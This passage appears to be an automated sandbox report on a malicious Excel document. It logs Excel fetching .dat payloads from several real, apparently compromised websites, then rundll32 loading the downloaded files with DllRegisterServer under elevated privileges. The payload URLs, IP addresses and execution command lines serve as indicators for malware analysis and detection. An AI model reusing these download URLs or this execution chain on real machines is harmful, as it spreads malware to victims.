                           Feb 24, 2021 11:54:21.506086111 CET | 80 | 49174 | 72.52.227.180 | 192.168.2.22
                           Feb 24, 2021 11:54:21.506186008 CET | 49174 | 80 | 192.168.2.22 | 72.52.227.180
                           Feb 24, 2021 11:54:21.507049084 CET | 49174 | 80 | 192.168.2.22 | 72.52.227.180
                           Feb 24, 2021 11:54:21.640588999 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.640621901 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.640722990 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.640769005 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.640809059 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.640829086 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.640887022 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.640904903 CET | 49170 | 443 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:21.640928984 CET | 49170 | 443 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:21.640930891 CET | 49170 | 443 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:21.640933037 CET | 49170 | 443 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:21.640942097 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.640968084 CET | 49170 | 443 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:21.640970945 CET | 49170 | 443 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:21.640974045 CET | 49170 | 443 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:21.641050100 CET | 49170 | 443 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:21.641051054 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.641068935 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.641081095 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.641093969 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.641107082 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.641130924 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.641132116 CET | 49170 | 443 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:21.641145945 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.641149044 CET | 49170 | 443 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:21.641153097 CET | 49170 | 443 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:21.641165018 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.641192913 CET | 49170 | 443 | 192.168.2.22 | 138.36.237.100
                          Feb 24, 2021 11:54:21.641202927 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.641206980 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.641212940 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.641225100 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.641246080 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.641272068 CET49170443192.168.2.22138.36.237.100
                          Feb 24, 2021 11:54:21.641278028 CET44349170138.36.237.100192.168.2.22
                          Feb 24, 2021 11:54:21.641282082 CET49170443192.168.2.22138.36.237.100
Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Feb 24, 2021 11:54:13.501976013 CET  52197        53         192.168.2.22  8.8.8.8
Feb 24, 2021 11:54:13.675236940 CET  53           52197      8.8.8.8       192.168.2.22
Feb 24, 2021 11:54:14.341540098 CET  53099        53         192.168.2.22  8.8.8.8
Feb 24, 2021 11:54:14.498265982 CET  53           53099      8.8.8.8       192.168.2.22
Feb 24, 2021 11:54:15.374135971 CET  52838        53         192.168.2.22  8.8.8.8
Feb 24, 2021 11:54:15.749438047 CET  53           52838      8.8.8.8       192.168.2.22
Feb 24, 2021 11:54:17.745513916 CET  61200        53         192.168.2.22  8.8.8.8
Feb 24, 2021 11:54:17.797508955 CET  53           61200      8.8.8.8       192.168.2.22
Feb 24, 2021 11:54:17.805962086 CET  49548        53         192.168.2.22  8.8.8.8
Feb 24, 2021 11:54:17.857635975 CET  53           49548      8.8.8.8       192.168.2.22
Feb 24, 2021 11:54:18.077522039 CET  55627        53         192.168.2.22  8.8.8.8
Feb 24, 2021 11:54:18.126564026 CET  53           55627      8.8.8.8       192.168.2.22
Feb 24, 2021 11:54:18.146034956 CET  56009        53         192.168.2.22  8.8.8.8
Feb 24, 2021 11:54:18.198153973 CET  53           56009      8.8.8.8       192.168.2.22
Feb 24, 2021 11:54:18.511854887 CET  61865        53         192.168.2.22  8.8.8.8
Feb 24, 2021 11:54:18.563889980 CET  53           61865      8.8.8.8       192.168.2.22
Feb 24, 2021 11:54:18.577310085 CET  55171        53         192.168.2.22  8.8.8.8
Feb 24, 2021 11:54:18.626219988 CET  53           55171      8.8.8.8       192.168.2.22
Feb 24, 2021 11:54:21.980869055 CET  52496        53         192.168.2.22  8.8.8.8
Feb 24, 2021 11:54:22.141863108 CET  53           52496      8.8.8.8       192.168.2.22
Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name                         Type            Class
Feb 24, 2021 11:54:13.501976013 CET  192.168.2.22  8.8.8.8  0x26d4    Standard query (0)  rzminc.com                   A (IP address)  IN (0x0001)
Feb 24, 2021 11:54:14.341540098 CET  192.168.2.22  8.8.8.8  0x437e    Standard query (0)  pathinanchilearthmovers.com  A (IP address)  IN (0x0001)
Feb 24, 2021 11:54:15.374135971 CET  192.168.2.22  8.8.8.8  0xb648    Standard query (0)  jugueterialatorre.com.ar     A (IP address)  IN (0x0001)
Feb 24, 2021 11:54:17.745513916 CET  192.168.2.22  8.8.8.8  0x71dd    Standard query (0)  crt.sectigo.com              A (IP address)  IN (0x0001)
Feb 24, 2021 11:54:17.805962086 CET  192.168.2.22  8.8.8.8  0xfc39    Standard query (0)  crt.sectigo.com              A (IP address)  IN (0x0001)
Feb 24, 2021 11:54:21.980869055 CET  192.168.2.22  8.8.8.8  0xa9f6    Standard query (0)  biblicalisraeltours.com      A (IP address)  IN (0x0001)
Timestamp                            Source IP  Dest IP       Trans ID  Reply Code    Name                         CName  Address         Type            Class
Feb 24, 2021 11:54:13.675236940 CET  8.8.8.8    192.168.2.22  0x26d4    No error (0)  rzminc.com                          72.52.227.180   A (IP address)  IN (0x0001)
Feb 24, 2021 11:54:14.498265982 CET  8.8.8.8    192.168.2.22  0x437e    No error (0)  pathinanchilearthmovers.com         162.241.80.6    A (IP address)  IN (0x0001)
Feb 24, 2021 11:54:15.749438047 CET  8.8.8.8    192.168.2.22  0xb648    No error (0)  jugueterialatorre.com.ar            138.36.237.100  A (IP address)  IN (0x0001)
Feb 24, 2021 11:54:17.797508955 CET  8.8.8.8    192.168.2.22  0x71dd    No error (0)  crt.sectigo.com                     91.199.212.52   A (IP address)  IN (0x0001)
Feb 24, 2021 11:54:17.857635975 CET  8.8.8.8    192.168.2.22  0xfc39    No error (0)  crt.sectigo.com                     91.199.212.52   A (IP address)  IN (0x0001)
Feb 24, 2021 11:54:22.141863108 CET  8.8.8.8    192.168.2.22  0xa9f6    No error (0)  biblicalisraeltours.com             68.66.216.42    A (IP address)  IN (0x0001)
                          • rzminc.com
                          • pathinanchilearthmovers.com
                          • jugueterialatorre.com.ar
                          • biblicalisraeltours.com
Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
0           192.168.2.22  49167        72.52.227.180   80                C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp                            kBytes transferred  Direction  Data
Feb 24, 2021 11:54:13.848664999 CET  0                   OUT        GET /xklyulyijvn/44251495573726900000.dat HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: rzminc.com
Connection: Keep-Alive
Feb 24, 2021 11:54:14.320781946 CET  1                   IN         HTTP/1.1 200 OK
Date: Wed, 24 Feb 2021 10:54:13 GMT
Server: Apache/2.4.46 (CentOS)
X-Powered-By: PHP/7.3.27
Upgrade: h2
Connection: keep-alive, close
Cache-Control: private, must-revalidate
Expires: Wed, 24 Feb 2021 10:54:13 GMT
Content-Length: 0
Content-Type: text/html; charset=UTF-8


Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
1           192.168.2.22  49168        162.241.80.6    80                C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp                            kBytes transferred  Direction  Data
Feb 24, 2021 11:54:14.660200119 CET  2                   OUT        GET /eznwcdhx/44251495573726900000.dat HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: pathinanchilearthmovers.com
Connection: Keep-Alive
Feb 24, 2021 11:54:15.358295918 CET  2                   IN         HTTP/1.1 200 OK
Date: Wed, 24 Feb 2021 10:54:14 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Cache-Control: max-age=300
Expires: Wed, 24 Feb 2021 10:59:14 GMT
X-Endurance-Cache-Level: 2
Content-Length: 0
Keep-Alive: timeout=5, max=75
Content-Type: text/html; charset=UTF-8


Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
2           192.168.2.22  49169        138.36.237.100  80                C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp                            kBytes transferred  Direction  Data
Feb 24, 2021 11:54:16.042413950 CET  3                   OUT        GET /xjzpfwc/44251495573726900000.dat HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: jugueterialatorre.com.ar
Connection: Keep-Alive
Feb 24, 2021 11:54:16.467619896 CET  4                   IN         HTTP/1.1 301 Moved Permanently
Date: Wed, 24 Feb 2021 10:54:16 GMT
Server: Apache
X-Powered-By: PHP/7.3.20
Set-Cookie: e34c2f879dc85bcd47ed95fb5d2ec3c0=77f179d46abad0720483b69daa2a8633; path=/; secure; HttpOnly
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Last-Modified: Wed, 24 Feb 2021 10:54:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: https://jugueterialatorre.com.ar/xjzpfwc/44251495573726900000.dat
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8


Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
3           192.168.2.22  49174        72.52.227.180   80                C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp                            kBytes transferred  Direction  Data
Feb 24, 2021 11:54:21.507049084 CET  92                  OUT        GET /fdzgprclatqo/44251495573726900000.dat HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: rzminc.com
Connection: Keep-Alive
Feb 24, 2021 11:54:21.965558052 CET  121                 IN         HTTP/1.1 200 OK
Date: Wed, 24 Feb 2021 10:54:21 GMT
Server: Apache/2.4.46 (CentOS)
X-Powered-By: PHP/7.3.27
Upgrade: h2
Connection: keep-alive, close
Cache-Control: private, must-revalidate
Expires: Wed, 24 Feb 2021 10:54:21 GMT
Content-Length: 0
Content-Type: text/html; charset=UTF-8


Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
4           192.168.2.22  49175        68.66.216.42    80                C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp                            kBytes transferred  Direction  Data
Feb 24, 2021 11:54:22.296935081 CET  122                 OUT        GET /otmchxmxeg/44251495573726900000.dat HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: biblicalisraeltours.com
Connection: Keep-Alive
Feb 24, 2021 11:54:22.776196003 CET  122                 IN         HTTP/1.1 200 OK
Connection: Keep-Alive
X-Powered-By: PHP/7.4.14
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Date: Wed, 24 Feb 2021 10:54:22 GMT
Server: LiteSpeed
Strict-Transport-Security: max-age=63072000; includeSubDomains
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: upgrade-insecure-requests
X-XSS-Protection: 1; mode=block
Referrer-Policy: no-referrer-when-downgrade


Timestamp: Feb 24, 2021 11:54:17.087672949 CET
Source IP: 138.36.237.100    Source Port: 443    Dest IP: 192.168.2.22    Dest Port: 49170
Certificate 1:
  Subject:    CN=jugueterialatorre.com.ar
  Issuer:     CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB
  Not Before: Tue Jun 02 02:00:00 CEST 2020
  Not After:  Thu Jun 03 01:59:59 CEST 2021
Certificate 2:
  Subject:    CN=RapidSSL RSA CA 2018, OU=www.digicert.com, O=DigiCert Inc, C=US
  Issuer:     CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US
  Not Before: Mon Nov 06 13:23:33 CET 2017
  Not After:  Sat Nov 06 13:23:33 CET 2027
JA3 SSL Client Fingerprint: 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0
JA3 SSL Client Digest: 7dcce5b76c8b17472d024758970a406b

                          Code Manipulations

                          Statistics

                          Behavior

                          System Behavior

Start time: 11:53:35
Start date: 24/02/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13ff70000
File size: 27641504 bytes
MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Start time: 11:53:46
Start date: 24/02/2021
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: rundll32 ..\JDFR.hdfgr,DllRegisterServer
Imagebase: 0xff3d0000
File size: 45568 bytes
MD5 hash: DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Start time: 11:53:47
Start date: 24/02/2021
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: rundll32 ..\JDFR.hdfgr1,DllRegisterServer
Imagebase: 0xff3d0000
File size: 45568 bytes
MD5 hash: DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Start time: 11:53:48
Start date: 24/02/2021
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: rundll32 ..\JDFR.hdfgr2,DllRegisterServer
Imagebase: 0xff3d0000
File size: 45568 bytes
MD5 hash: DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Start time: 11:53:48
Start date: 24/02/2021
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: rundll32 ..\JDFR.hdfgr3,DllRegisterServer
Imagebase: 0xff3d0000
File size: 45568 bytes
MD5 hash: DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Start time: 11:53:49
Start date: 24/02/2021
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: rundll32 ..\JDFR.hdfgr4,DllRegisterServer
Imagebase: 0xff3d0000
File size: 45568 bytes
MD5 hash: DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                          Disassembly

                          Code Analysis